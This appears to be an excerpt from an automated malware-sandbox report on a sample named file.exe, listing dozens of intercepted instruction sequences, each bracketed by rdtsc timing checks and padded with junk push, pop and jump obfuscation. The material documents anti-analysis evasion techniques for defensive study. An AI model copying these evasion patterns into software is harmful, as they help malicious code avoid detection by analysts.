                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E7EC second address: 124E7FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F020CB2844Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E7FF second address: 124E827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F020CB267E6h 0x0000000c jmp 00007F020CB267F7h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E827 second address: 124E82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E82B second address: 124E82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E82F second address: 124E83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125317B second address: 125318C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12533E7 second address: 12533EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125364A second address: 12536C5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F020CB267ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop eax 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F020CB267E8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e push dword ptr [ebp+122D2819h] 0x00000034 jc 00007F020CB267EDh 0x0000003a jg 00007F020CB267E7h 0x00000040 call 00007F020CB267E9h 0x00000045 push ecx 0x00000046 push ecx 0x00000047 jmp 00007F020CB267F0h 0x0000004c pop ecx 0x0000004d pop ecx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F020CB267EFh 0x00000056 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12536C5 second address: 12536D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12536D7 second address: 12536F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F020CB267E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F020CB267EEh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12550BA second address: 12550E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F020CB2844Fh 0x0000000b jmp 00007F020CB28455h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12550E4 second address: 1255100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F020CB267F3h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255100 second address: 125510A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F020CB2845Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840007 second address: 4840027 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dl, CBh 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F020CB267EEh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840027 second address: 484002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484002B second address: 4840031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840031 second address: 4840047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB28452h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483007D second address: 4830083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830083 second address: 4830089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830089 second address: 483008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483008D second address: 4830091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860EFA second address: 4860F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 mov bl, 34h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860F03 second address: 4860F30 instructions: 0x00000000 rdtsc 0x00000002 mov cx, A24Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F020CB28452h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F020CB2844Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4800114 second address: 480011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 480011A second address: 48001EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F020CB2844Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F020CB28450h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F020CB2844Eh 0x0000001d xor ch, FFFFFFE8h 0x00000020 jmp 00007F020CB2844Bh 0x00000025 popfd 0x00000026 push ecx 0x00000027 pushfd 0x00000028 jmp 00007F020CB2844Fh 0x0000002d jmp 00007F020CB28453h 0x00000032 popfd 0x00000033 pop ecx 0x00000034 popad 0x00000035 push dword ptr [ebp+04h] 0x00000038 pushad 0x00000039 mov cl, dh 0x0000003b movzx ecx, bx 0x0000003e popad 0x0000003f push dword ptr [ebp+0Ch] 0x00000042 jmp 00007F020CB28459h 0x00000047 push dword ptr [ebp+08h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov edx, 150079EEh 0x00000052 pushfd 0x00000053 jmp 00007F020CB2844Fh 0x00000058 sbb si, 3A9Eh 0x0000005d jmp 00007F020CB28459h 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820E0C second address: 4820E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 call 00007F020CB267EBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F020CB267F2h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48209B8 second address: 48209BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48209BC second address: 48209E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, 4982h 0x0000000f call 00007F020CB267F3h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48209E0 second address: 48209E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48209E6 second address: 4820A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F020CB267F9h 0x00000014 sub esi, 039576B6h 0x0000001a jmp 00007F020CB267F1h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48208B6 second address: 48208DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F020CB2844Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48208DA second address: 48208EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267EEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48208EC second address: 4820928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F020CB28458h 0x00000012 adc ecx, 4D01F938h 0x00000018 jmp 00007F020CB2844Bh 0x0000001d popfd 0x0000001e mov ax, 836Fh 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820928 second address: 482097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F020CB267ECh 0x00000012 add ecx, 42F5F2C8h 0x00000018 jmp 00007F020CB267EBh 0x0000001d popfd 0x0000001e mov ecx, 2869403Fh 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F020CB267F1h 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820602 second address: 4820606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820606 second address: 482060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482060A second address: 4820610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820610 second address: 482063E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB267EBh 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F020CB267F2h 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482063E second address: 4820642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820642 second address: 4820648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820648 second address: 4820662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB2844Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820662 second address: 4820668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820668 second address: 482066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482066E second address: 4820672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483035E second address: 483039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F020CB28451h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F020CB2844Dh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483039D second address: 48303A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48303A3 second address: 48303EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F020CB28456h 0x0000001b pop ecx 0x0000001c jmp 00007F020CB2844Bh 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484038E second address: 4840394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840394 second address: 4840398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840398 second address: 48403BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F020CB267F6h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48403BE second address: 48403C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48403C2 second address: 48403DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48403DF second address: 4840400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, si 0x00000011 movzx ecx, di 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4840400 second address: 484044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov cx, C67Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F020CB267F0h 0x00000016 or eax, 5ABE4268h 0x0000001c jmp 00007F020CB267EBh 0x00000021 popfd 0x00000022 mov ax, 705Fh 0x00000026 popad 0x00000027 and dword ptr [eax], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F020CB267F1h 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48207E0 second address: 482080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F020CB2844Dh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482080E second address: 4820814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4820814 second address: 4820846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F020CB28450h 0x00000012 or ax, A228h 0x00000017 jmp 00007F020CB2844Bh 0x0000001c popfd 0x0000001d movzx esi, bx 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830EE7 second address: 4830F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F020CB267F7h 0x00000010 push eax 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F020CB267F9h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830F42 second address: 4830F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830F57 second address: 4830F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830F5D second address: 4830F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830F61 second address: 4830FBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edx, 7405CE58h 0x00000010 pushad 0x00000011 jmp 00007F020CB267F7h 0x00000016 pushfd 0x00000017 jmp 00007F020CB267F8h 0x0000001c or ah, FFFFFFE8h 0x0000001f jmp 00007F020CB267EBh 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830FBA second address: 4830FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48606F3 second address: 4860776 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F020CB267F0h 0x00000008 jmp 00007F020CB267F5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushfd 0x00000012 jmp 00007F020CB267F7h 0x00000017 sub cl, 0000006Eh 0x0000001a jmp 00007F020CB267F9h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F020CB267F7h 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860776 second address: 486077C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486077C second address: 48607AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, D165h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F020CB267EBh 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F020CB267F5h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48607AC second address: 4860868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 69F2h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [774365FCh] 0x00000011 jmp 00007F020CB2844Fh 0x00000016 test eax, eax 0x00000018 jmp 00007F020CB28456h 0x0000001d je 00007F027F67B5C8h 0x00000023 pushad 0x00000024 mov bx, ax 0x00000027 pushad 0x00000028 movzx esi, di 0x0000002b mov bx, 3768h 0x0000002f popad 0x00000030 popad 0x00000031 mov ecx, eax 0x00000033 jmp 00007F020CB28457h 0x00000038 xor eax, dword ptr [ebp+08h] 0x0000003b jmp 00007F020CB2844Fh 0x00000040 and ecx, 1Fh 0x00000043 jmp 00007F020CB28456h 0x00000048 ror eax, cl 0x0000004a jmp 00007F020CB28450h 0x0000004f leave 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F020CB28457h 0x00000057 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860868 second address: 486086E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486086E second address: 48608AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00FA2014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F0210428BFFh 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007F020CB28457h 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F020CB28455h 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608AA second address: 48608B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608B0 second address: 48608B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608B4 second address: 48608B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608B8 second address: 48608EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F0210428C40h 0x00000010 mov edi, edi 0x00000012 jmp 00007F020CB2844Fh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov cx, 49CBh 0x0000001d mov dl, ch 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cx, dx 0x00000027 jmp 00007F020CB2844Bh 0x0000002c popad 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608EE second address: 48608F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608F4 second address: 48608F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48608F8 second address: 486093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F020CB267F6h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F020CB267F0h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov edi, 73C3AEDCh 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 481002D second address: 4810033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810033 second address: 4810037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4810037 second address: 481003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
